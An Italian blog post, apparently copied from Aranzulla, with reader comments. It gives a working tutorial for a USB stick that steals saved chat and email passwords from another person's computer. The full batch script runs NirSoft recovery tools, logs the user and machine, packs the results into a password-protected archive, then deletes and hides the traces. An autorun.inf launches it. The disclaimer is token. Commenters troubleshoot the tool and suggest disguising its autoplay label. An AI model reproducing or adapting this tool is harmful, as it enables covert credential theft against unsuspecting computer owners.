Fonte: Aranzulla
Torniamo a parlare di trucchetti " Hacker " ,tempo fa vi avevo spiegato come si possono scoprire password Msn , ma oggi una cosa ancora più interessante, vedremo come rubare tutte ma proprio tutte le password di un computer grazie ad una chiavetta usb .
Naturalmente il tutto a scopo informativo,quindi non utilizzate il contenuto di questo articolo per scopi illegali,mi raccomando .
Ecco la guida per rubare password con una chiavetta Usb con l'esempio pratico:
Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimenticano. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.
Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.
Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.
Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.
Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.
A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e fate click sulla voce WinRAR 3.60 (Graphic and command line). Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.
Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
Al termine del file scrivete, invece, le righe:
REM Scrittura del file di log@echo COMPUTERNAME = %COMPUTERNAME% > log.txt@echo USERNAME = %USERNAME% >> log.txt@echo USERDOMAIN = %USERDOMAIN% >> log.txt@echo USERPROFILE = %USERPROFILE% >> log.txt@echo. >> log.txt@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt
REM Compressione@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati@del *.html@del log.txt@attrib +h *.exe@attrib +h autorun.inf
In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.
La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:
@mspass.exe /sverhtml mspass.html@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log@echo COMPUTERNAME = %COMPUTERNAME% > log.txt@echo USERNAME = %USERNAME% >> log.txt@echo USERDOMAIN = %USERDOMAIN% >> log.txt@echo USERPROFILE = %USERPROFILE% >> log.txt@echo. >> log.txt@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt
REM Compressione@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati@del *.html@del log.txt@attrib +h *.exe@attrib +h autorun.inf
Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.
Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:
[autorun]open=lancia.bataction=Preleva password
A questo punto avete finito. Nella cartella troverete i seguenti file:
Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:
Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.
L’articolo è stato aggiornato rispetto alla pubblicazione iniziale, grazie all’aiuto del blogger Alessandro Ferrari, che ha revisionato il codice .BAT. L’articolo è puramente a scopo di studio e l’autore non si ritiene responsabile per eventuali usi impropri. Rubare password che non siano le proprie non è legale.



20 commenti:
ho un problema con l'apertura del programma che dovrebbe prelevare le password.....ho fatto tutti i passaggi che avete spiegato nella pagina ma siccome nn mi si lancia l'autoplay della mia chiavetta USB una volta inserita nella porta, non posso prelevare un bel niente....se nn ho capito male si puo lanciare solo tramite l'autoplay, ma non ce un'altro modo in alternativa??....se mi sapete spiegare come mai nn mi si apre l'autoplay vi ringrazio molto....
ps: l'autoplay non si apriva neanche prima di fare questa cosa sulla penna....è proprio che nn si apre!!!!
allora amico...
io ho diversi programmi...uno dei quali mi permette di entrare in un computer a distanza...ma mi servon le password..cmq a me serve un programma da mettere nella chiavetta che mi prelevi le password del computer...cioè mi serve il programma che i rubi le password di ogni utnte del computer...allora mi puoi trovare questo programma...per piacere
grazie
io ho lo stesso problema.. inserisco la chiavetta nella porta usb ma non mi compare la finestra dell'autoplay (quella dove sopra l'icona "apri cartella per visualizzare i file" dovrebbe esserci l'icona "preleva password". Come si può fare in alternativa? qualcuno conosce un rimedio?
Idem..inserisco la chiavetta nel pc..ma non mi appare la finestra dove mi dovrebbe chiedere di prelevare la password..ho seguito tutti i procedimenti...cè qualcuno che puo rispondere tempestivamente e darci una soluzione?
ank io la stessa cosa!!nn si apre la finestra dell'autoplay....x favore qualcuno ci aiuti!
Salve, chiamatemi Mouse.
Se non vi si apre subito il problema è facilmente risolvibile, basta cliccare sul file lancia.bat e farà lo stesso tutto da solo. In pratica il programma autoran.inf non fa altro che dire al sistema "devi avviare questi programmi in automatico e visualizza questo in automatico" cioè avvia lancia.bat e scrivi "Preleva password". Ovviamente possiamo cambiare la scritta Preleva password con Recupera dati... per dare meno all'occhio!
Detto ciò a me invece parte l'autoPlay della penna ma siccome monta l'U3 Launch System (penso sia quello il motivo) quando parte l'autoplay tipico di Windows non mi fa vedere la frase dell'eutoran.inf e quindi non mi esegue il file batch. Se clicco invece sul file lancia.bat mi esegue le operazioni ma non mi salva le pagine html nel file .rar!!
Qualcuno può rispondere? Thanks.
Ciao io ho fatto penso tutto per bene non mi spunta preleva password come mai?
ciao scusa...ho seguito tutte le operazioni però c'è un problema...quando vado ad aprire il file in winrar mi esce la scritta inserire la password del file criptato in log.txt...anche se provo a cliccare su ok o su annulla l'azione diventa nulla e la cartella estratta risulta vuota...come devo fare???
aiutoooo è tutto in inglese mi date una mano??
il winRar che indichi è valido solo per 40 giorni, è possibile modificare il programma per usare 7zip... io ci ho provato, ma crea solo i file HTML poi non zippa nè cripta nulla.
saluti
quella di sopra è una domanda... ho dimenticato il punto interrogativo :)
anke a me nn va l'autoran. ma le password dove dovrebbero rimanere salvate una volta inserita la chiavetta?? rispondetemi grz
LO POSSO FARE ANCHE CON EXCELL E WORD?
Perchè non mi viene la scritta nell'autoplay?
PS:ho windows 7, forse c'entra qualcosa?
A me ha funzionato benissimo e in più se selezionate " Esegui sempre l'operazione selezionata" non doovete nemmeno perdere a clikkare ok
Approposito per far funzionare il programma per prelevare le password bisogna togliere l'USB senza selezionare rimozione sicura dell'hardware. :-)
E' una cosa magnifica questa della pennetta ragà!!!!!!!!!!
Signor Hacker98 potresti dirmi dv viene salvato il file delle password?? Grazie. Cordiali saluti
dove si scarica il programma?
Ciao Hacker98,mi puoi dire se quelle righe che bisogna mettere nel blocco note per creare lancia.bat vanno scritte con gli spazi o senza?perchè a me l'icona è diversa e,al momento che ci clicco non succede niente!
grazie in anticipo
Posta un commento